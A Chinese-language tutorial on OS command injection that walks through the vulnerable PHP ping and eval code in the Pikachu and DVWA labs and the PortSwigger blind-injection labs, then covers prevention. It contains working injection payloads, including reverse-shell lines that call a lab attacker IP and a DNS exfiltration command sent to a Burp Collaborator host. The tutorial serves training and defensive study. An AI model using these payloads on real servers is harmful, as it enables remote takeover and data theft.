RCE基本原理(remote command/code execute)
文章目录
什么是操作系统命令注入?
操作系统命令注入(也称为 shell 注入)是一种 Web 安全漏洞,它允许攻击者在运行应用程序的服务器上执行任意操作系统 (OS) 命令,并且通常会完全破坏应用程序及其所有数据。很多时候,攻击者可以利用操作系统命令注入漏洞来破坏托管基础设施的其他部分,利用信任关系将攻击转向组织内的其他系统。
| 类型 | 效果 |
|---|---|
| command1 & command2 | command1与command2同时执行,不管command 1是否执行成功 |
| command1 && command2 | 先执行command1,如果为真,再执行command2 |
| command1 | command2 | 只执行command2 |
| command1 || command2 | 先执行command1,如果为假,再执行command2 |
pikachu
ping
if (isset($_POST['submit']) && $_POST['ipaddress'] != null) {
$ip = $_POST['ipaddress'];
// $check=explode('.', $ip);可以先拆分,然后校验数字以范围,第一位和第四位1-255,中间两位0-255
if (stristr(php_uname('s'), 'windows')) {
// var_dump(php_uname('s'));
$result .= shell_exec('ping ' . $ip); //直接将变量拼接进来,没做处理
} else {
$result .= shell_exec('ping -c 4 ' . $ip);
}
}
正常使用
可以保存文件
127.0.0.1| ipconfig > 1.txt
linux可以 利用RCE漏洞写一个bash反弹脚本:
centos8 192.168.100.131
kali 192.168.100.133
1| echo "1234" > 1.sh
φ(゜▽゜*)? φ(゜▽゜*)? φ(゜▽゜*)? φ(゜▽゜*)? bash结合重定向方法的一句话
1|echo "bash -i >& /dev/tcp/192.168.100.133/4444 0>&1" > /tmp/1.sh
nc -lvp 4444
1 | bash /tmp/1.sh
evel
$html = '';
if (isset($_POST['submit']) && $_POST['txt'] != null) {
if (@!eval($_POST['txt'])) {
$html .= "<p>你喜欢的字符还挺奇怪的!</p>";
}
}
这个就更方便了
system('pwd');
观察源码可直接用一句话木马连接
利用RCE漏洞写一个bash反弹脚本:
centos8 192.168.100.131
kali 192.168.100.133
system("echo 'bash -i >& /dev/tcp/192.168.100.133/1234 0>&1' | bash");
nc -nvlp 1234
dvwa
low
同pikachu ping
1|echo "bash -i >& /dev/tcp/192.168.100.133/4444 0>&1" > /tmp/1.sh
medium
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = $_REQUEST[ 'ip' ];
// Set blacklist
$substitutions = array(
'&&' => '',
';' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
只是替换了部分 同pikachu ping
1|echo "bash -i >& /dev/tcp/192.168.100.133/4444 0>&1" > /tmp/1.sh
high
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = trim($_REQUEST[ 'ip' ]);
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
开发者在“| ”后面加了个空格,因此我们还是能够用 “|” 连接符进行绕过。同pikachu ping
1|echo "bash -i >& /dev/tcp/192.168.100.133/4444 0>&1" > /tmp/1.sh
Impossible
if( isset( $_POST[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$target = $_REQUEST[ 'ip' ];
$target = stripslashes( $target );
// Split the IP into 4 octects
$octet = explode( ".", $target );
// Check IF each octet is an integer
if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
// If all 4 octets are int's put the IP back together.
$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
else {
// Ops. Let the user name theres a mistake
echo '<pre>ERROR: You have entered an invalid IP.</pre>';
}
}
// Generate Anti-CSRF token
generateSessionToken();
对参数 ip 进行了严格的限制,只有“数字.数字.数字.数字”的输入才会被接收执行, 加入了 Anti-CSRF token 进行进一步保障,使得命令注入漏洞不存在。
Portswigger
具有时间延迟的盲操作系统命令注入
应用程序执行一个包含用户提供的详细信息的 shell 命令。命令的输出不会在响应中返回。
name=admin&email=123456%40qq.com||ping -c 10 127.0.0.1||&subject=1&message=1
该ping命令是执行此操作的有效方法,命令将导致应用程序在 10 秒内 ping 其环回网络适配器。
带有输出重定向的盲操作系统命令注入
该应用程序从该位置为产品目录提供图像。您可以将注入命令的输出重定向到此文件夹中的文件,然后使用图像加载 URL 检索文件的内容。
本实验有一个图片文件夹
/var/www/images/
图片路径
https://ac721f891f1fa408c0be0c78008700df.web-security-academy.net/image?filename=36.jpg
注入方法
name=admin&email=123456%40qq.com||dir>/var/www/images/output.txt||&subject=1&message=1
查看结果
https://ac721f891f1fa408c0be0c78008700df.web-security-academy.net/image?filename=output.txt
带外数据泄露的盲操作系统命令注入
通过用 nslookup DNS 查询将输出泄露到 Burp Collaborator
注入方法
name=admin&email=123456%40qq.com||nslookup `whoami`.li752zu6b0m9bfw7kg0v5xc3wu2kq9.burpcollaborator.net||&subject=1&message=1
peter-NqSY9R 即为 whoami 结果
如何防止操作系统命令注入攻击
到目前为止,防止操作系统命令注入漏洞的最有效方法是永远不要从应用层代码调用操作系统命令。几乎在每种情况下,都存在使用更安全的平台 API 实现所需功能的替代方法。
如果认为使用用户提供的输入调用操作系统命令是不可避免的,则必须执行强输入验证。有效验证的一些示例包括:
- 根据允许值的白名单进行验证。
- 验证输入是否为数字。
- 验证输入仅包含字母数字字符,不包含其他语法或空格。
永远不要试图通过转义 shell 元字符来清理输入,在实践中,这太容易出错并且容易被熟练的攻击者绕过。
